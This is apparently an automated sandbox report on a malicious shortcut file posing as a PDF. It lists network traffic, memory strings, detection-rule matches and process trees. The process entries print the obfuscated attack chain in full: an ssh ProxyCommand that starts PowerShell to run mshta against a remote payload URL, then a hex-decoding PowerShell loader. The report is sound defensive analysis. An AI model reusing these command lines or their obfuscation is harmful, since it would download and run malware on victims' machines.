        Source: global trafficHTTP traffic detected: GET /naailq0.cpl HTTP/1.1Host: berb.fitnessclub-filmfanatics.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: cndef1.green-pathways.shop
        Source: global trafficDNS traffic detected: DNS query: pastebin.com
        Source: global trafficDNS traffic detected: DNS query: www.360.net
        Source: global trafficDNS traffic detected: DNS query: 360.net
        Source: global trafficDNS traffic detected: DNS query: www.baidu.com
        Source: global trafficDNS traffic detected: DNS query: berb.fitnessclub-filmfanatics.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 17 Dec 2024 07:48:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oll0ScsLPkgKbJza0MKzrcTGwOEAEuKqAPlZpOwSd96YFxxyp0q0fOWAV4Ty6gLU1hn8PwekCV0TJDkM2MYp%2Fn8lOaSGFHwFt9QKHSeAlDTegho8YD0nYmujAgB%2FfyG6OMNW%2FvptkRH7FfjZXXkEcPMneAU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f354faebfd84391-EWR
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://360.net
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://berb.fitnessclub-filmfanatics.com
        Source: svchost.exe, 00000006.00000002.3313420291.000001FDFF284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
        Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 00000007.00000002.2172223348.0000022C901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2172223348.0000022C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C805C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CB76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2085750541.0000018A0E696000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD7A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950C9C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E8F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.360.net
        Source: powershell.exe, 00000007.00000002.2131766032.0000022C8023A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.baidu.com
        Source: powershell.exe, 00000007.00000002.2183387067.0000022CF4021000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
        Source: powershell.exe, 00000004.00000002.2077643742.0000024FAD3EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.wshifen.com
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://360.net
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E03F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://360.net/
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://360.net9
        Source: powershell.exe, 00000002.00000002.2085750541.0000018A0E64C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000002.00000002.2085750541.0000018A0E669000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD73B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD77E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950C9C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://berb.fitnessclub-filmfanatics.com
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E7CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E147000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://berb.fitnessclub-filmfanatics.com/naailq0.cpl
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://berb.fitnessclub-filmfanatp
        Source: powershell.exe, 00000004.00000002.2078120843.0000024FADBC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.g
        Source: powershell.exe, 00000004.00000002.2078120843.0000024FADBC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.gX
        Source: mshta.exe, 00000005.00000003.2190556968.0000029153A92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/
        Source: powershell.exe, 00000002.00000002.2085750541.0000018A0EB15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/a
        Source: mshta.exe, 00000005.00000002.2205452333.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2190659101.00000299565FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4
        Source: powershell.exe | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4$global:?
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4(
        Source: mshta.exe, 00000005.00000003.2190659101.00000299565E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4...
        Source: mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp41
        Source: mshta.exe, 00000005.00000003.2193889505.000002995662D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2192336221.0000029956626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2208293493.000002995662D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp42S3
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4332c3237382c3237392c3238302c3230302c3237302c3238352c
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp45
        Source: mshta.exe, 00000005.00000002.2205299876.00000291539E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp46
        Source: powershell.exe, 00000004.00000002.2080055561.0000024FC5720000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205299876.00000291539E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4C:
        Source: mshta.exe, 00000005.00000002.2205957123.0000029153AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4H
        Source: mshta.exe, 00000005.00000003.2193889505.000002995662D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2192336221.0000029956626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2191535936.0000029956611000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2208293493.000002995662D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2190659101.00000299565FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4Q
        Source: mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4U
        Source: mshta.exe, 00000005.00000003.2197047004.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4Yi
        Source: mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4f
        Source: mshta.exe, 00000005.00000003.2192577700.0000029153A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2197047004.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4g
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4hZ
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A675000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp40
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp459
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4http
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4przq
        Source: mshta.exe, 00000005.00000002.2206174245.0000029153C10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4i
        Source: mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4m
        Source: powershell.exe, 00000004.00000002.2077226110.0000024FAB730000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4owsPowerShel
        Source: powershell.exe, 00000004.00000002.2078120843.0000024FAD721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD86E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4p
        Source: mshta.exe, 00000005.00000002.2208459188.000002995A4B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2192822020.000002995A4A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4werLMEMhx
        Source: powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
        Source: edb.log.6.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
        Source: svchost.exe, 00000006.00000003.2103224939.000001FDFEF60000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000007.00000002.2131766032.0000022C8130C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950D3EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
        Source: mshta.exe, 00000005.00000003.2197459842.0000029153A92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205615137.0000029153A92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2190556968.0000029153A92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
        Source: powershell.exe, 00000007.00000002.2172223348.0000022C901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2172223348.0000022C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C805C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CB76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
        Source: qmgr.db.6.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
        Source: powershell.exe, 00000007.00000002.2131766032.0000022C8023A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000007.00000002.2131766032.0000022C8023A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
        Source: powershell.exe, 00000009.00000002.2356233458.000002950DDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
        Source: powershell.exe, 00000009.00000002.2356233458.000002950DDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/0v6Vhvpb
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-4530e108b6.ttf
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-74fcdd51ab.svg#iconfont
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-840387fb42.woff
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-cdfecb8456.eot
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-cdfecb8456.eot?#iefix
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-fa013548a9.woff2
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://top.baidu.com/board?platform=pc&sa=pcindex_entry
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E7CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E147000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.360.net
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E7F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.360.net/
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E7F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.360.net/H
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E7CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E147000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.baidu.com
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.baidu.com/
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E94C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
        Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknown | HTTPS traffic detected: 104.21.83.229:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 180.163.242.102:443 -> 192.168.2.5:49715 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 103.235.47.188:443 -> 192.168.2.5:49728 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.66.20:443 -> 192.168.2.5:49739 version: TLS 1.2

        System Summary

        Source: Process Memory Space: powershell.exe PID: 984, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF8476F2478
        Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: C:\Windows\System32\mshta.exe | Process created: Commandline size = 7602
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 2901
        Source: Process Memory Space: powershell.exe PID: 984, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine | Classification label: mal100.troj.evad.winLNK@14/15@8/6
        Source: C:\Windows\System32\OpenSSH\ssh.exe | File created: C:\Users\user\.ssh
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv5g2sup.wqx.ps1
        Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | Virustotal: Detection: 34%
        Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | ReversingLabs: Detection: 26%
        Source: unknown | Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" .
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo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
